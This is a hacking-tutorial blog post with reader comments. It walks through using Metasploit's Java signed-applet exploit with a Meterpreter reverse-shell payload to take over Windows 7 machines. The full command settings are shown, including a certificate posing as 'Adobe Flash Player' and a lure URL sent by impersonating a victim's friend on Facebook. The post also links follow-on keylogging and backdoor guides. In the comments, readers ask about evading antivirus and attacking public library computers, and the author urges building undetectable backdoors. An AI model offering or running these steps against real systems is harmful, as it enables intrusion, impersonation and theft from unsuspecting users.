Hacking Windows 7 SP 1 Using Java Signed Applet Social Engineering Code Execution
Type : Tutorial
Level : Easy, Medium, Advanced
Success rate : Excellent
Platform : Win 7 SP 1(all windows), I’ve also tried in Linux Debian 6 using Iceweasel, but no luck..maybe someone has try it?
Today in this tutorial we will doing some trick using Social Engineering style to attack victim. Before we start, let me tell you a little story why I’m writing this tutorial 
.
Yesterday 2011/7/29 my friend KENT came to my home and then told me that his computer has been hacked because of link sent by his friend CLARK via facebook. CLARK didn’t know anything, because he never use his facebook and someone has impersonate him and starting to send malicious URL via facebook. KENT receive inbox message from fake CLARK in his facebook like this “hey I’ve uploaded the video of yours here http://attacker.com/videoplaylist“. KENT think that CLARK was his friend and KENT also curious want to see what kind of video his friend already upload.
Interesting isn’t it?someone can act as other person and started to sending malicious URL. (you can view here how to hack facebook using man in the middle attack). Now in this tutorial we will do almost the same thing Hacking Windows 7 SP 1 Using Java Signed Applet Social Engineering Code Execution. Let’s start
Requirement :
2. Operating System(I’m recommend using Linux OS or Backtrack 5)
Step By Step :
1. Open your msfconsole and find java_signed_applet exploit with command search java_signed_applet. If you can’t find it, try to update your Metasploit Framework to newer version with msfupdate command. If the exploit was available, let’s continue with picture below.
Legends :
use exploit/multi/browser/java_signed_applet ---> load the java_signed_applet exploit set payload windows/meterpreter/reverse_tcp ---> set the reverse_tcp meterpreter to connect back to our machine
2. The next step, we need to add some required switches to make an attack successful. The picture below is my switches configuration, but if you want to view available switches, you can type show options.
Legends :
set appletname Adobe_Inc ---> To inform the victim about the name of our java applet and make sure your victim not suspicious with link you give set certcn Adobe Flash Player ---> On older versions the dialog will display the value of CERTCN in the "Publisher" line. Newer JVMs display "UNKNOWN" when the signature is not trusted (i.e., it's not signed by a trusted CA). set srvhost 192.168.8.92 ---> host that served the exploit set srvport 80 ---> I'm choose 80, because it's really great for computer social engineering especially social engineering via website set uripath videoplaylist ---> the URL format to send to victim (http://192.168.8.92/videoplaylist) set lhost 192.168.8.92 ---> connect back address when successfully perform attack set lport 443 ---> port used to connect back to our machine
3. When everything has been set up correctly, run exploit command.
There’s an URL you should give to your victim http://192.168.8.92/videoplaylist.
4. When the victim open that link in their browser, immediately it will alert a dialog box about digital signature cannot be verified like picture below.
But it’s okay, because we are sending that link to KENT as CLARK so the success probability still above 75% 
.
5. After victim open the malicious URL and click RUN, here’s the screenshot in attacker computer.
6. Press CTRL + C to stop the process or you can directly run sessions -l to view the active sessions.
7. Yes we have 1 active sessions in our list. To interact with that session, simply run sessions -i 1 where 1 is the ID of the sessions.
PWNED! we’re already inside victim computer.
For the next step after successfully gain an access you can see the following tutorial :
5 Steps Using Meterpreter Keylogging
Login Windows Using PsExec Hash
5 Step to Enable Remote Desktop
Countermeasure :
1. Minimalize opening file you didn’t know.
2. Read the alert carefully if it’s appear. Sometimes just click “Next” or “OK” when alert appears was not a good idea
hope you enjoyed…
welcome for any comments, just drop it below
Incoming search terms:
- hack windows 7 metasploit
- windows 7 exploits
- windows 7 sp1 exploit
- armitage hack windows 7
- hack windows 7 with armitage
- windows 7 exploit metasploit
- hack windows 7
- metasploit java signed applet
- java signed applet metasploit
- hacking windows 7 sp1
Written by Vishnu Valentino.
Founder of hacking-tutorial.com. Love PHP, offensive security and web. Contact him at me[-at-]vishnuvalentino.com
See all posts by v4L || Visit Website : http://www.vishnuvalentino.com
Popular Posts
20 Responsesto “Hacking Windows 7 SP 1 Using Java Signed Applet Social Engineering Code Execution”
Trackbacks/Pingbacks
- Privilege Escalation in Metasploit Meterpreter (Backtrack 5) | Vishnu Valentino Hacking Tutorial, Tips and Trick - [...] This picture below taken when hackers successfully gain an access using Java Signed Applet Social Engineering Toolkit Code Execution. ...
- 10 Steps to Use NetCat as a Backdoor in Windows 7 System | Vishnu Valentino Hacking Tutorial, Tips and Trick - [...] In this tutorial I will write down the technique to set up the famous listener application NetCat as a ...
- How to get Files From Victim Using Backtrack + Metasploit | Vishnu Valentino Hacking Tutorial, Tips and Trick - [...] This tips and trick I will use Java Signed Applet Social Engineering Code Execution (see tutorial here) to exploit ...
Leave a Reply
Links
Get Updates via Networkedblogs
i dont understand…
what is the command to attack the ip address of our victim???
i dont understand…
leh say we know the vitim ip…
then how do we set the attack…
im confuse with the command…
#puppet
When you’re inside meterpreter, you can do everything there. use
helpcommand when you’re inside a meterpreter.hey guys i 'm new in the hacking stuf . i tried this tutorial step by step but i had a problem how to do from the step 3 to step 4
#jouj
In above example I’m doing it in Local Area Connection(LAN) and my friend also in same network with me. If you want to learn further about hacking via WAN, you can read the basics here.
ok thanks for reply so if i want to execute this tutorial in LAN how do i do from step 3 to step 4 ???
#jouj
Step 3 –> prepare the server for exploit
step 4 –> you see the URL generated at step 3? that URL you should sent to victim and wait until victim execute that URL in their browser.
hey…
i thnk i have found another method that is similar to this attack…i watch it on youtube…
http://www.youtube.com/watch?v=LoFaitVRg9U&feature=related & http://www.youtube.com/watch?v=JbDOa5lgbFg..
(but still working on it..)
I am using BT5 to follow the tutorial. However, I open the URL in the Win XP VM and it says done and nothing happen while in the Meterpreter it says Handlin request from IP:1129…
I have the 2 VM's (Win 7 and BT5) connected in the same network but it does not work.
In the SRVHOST = LHOST = IP in BT5. Any ideas?
Thanks
I already solved it… You need to download the latest java version
By 50 Mb of space I had to install win 7 in the VM all over again. Crazy…
#will.1.am
Nice to hear it already solved
Hi, great job, thank you
please confirm to me,
.
The plug-in JRE (java) must be already installed in the victim machine to sucess this exploit ?!!!!
am i right ?
other question ! its success in all browsers, or just IE ???
thanks a lot
#AbuM@lek
I’ve tried it on firefox it works..but i didn’t know how it works on other browser, but afaik it’s exploit for java so in my opinion it should work on any browser.
And it is detected by AV and Firewalls,
is there any other exploit FUD ???
thanks
#AbuM@lek
Yes it’s detected by AV, the important thing is the attack logic…
Thanks, is there any others exploits for Win7 sp1 (speciallay, not detected ?!)
Whenever I try to open a shell the antivirus software deletes it immediately. Even through this method. Why?
-DeusIgni
#Valentino
You have told that to me as well, its all about the "attack logic". That logic doesn't work. Show us a
method that does.
-DeusIgni
#deuslgni
Yes as I say it’s the logic…of course your antivirus can detect it(be realistic… antivirus was always updated almost every 1-2 days)…if you want to be undetected, you can make backdoor/trojan by yourself and think about new algorithm that can’t be traced by antivirus intelligence logic scan.
again I say that this tutorial only the logic…from here, you can learn how to make a backdoor/trojan/virus hidden and undetected by antivirus…
last : in this process, nothing is instant, but at least you already reduce your learning process timeline while you understand the logic of the attack and then move to learn new subject about “hiding backdoor from antivirus”.
Hi, Vish—Got a Question 4 u:
Public Libraries use Java.
Can this be performed by a WiFi LapTop inside the Library, or across the street?
Would the J2EE be the appropriate Countermeasure to prevent this from happening at all?
thanks.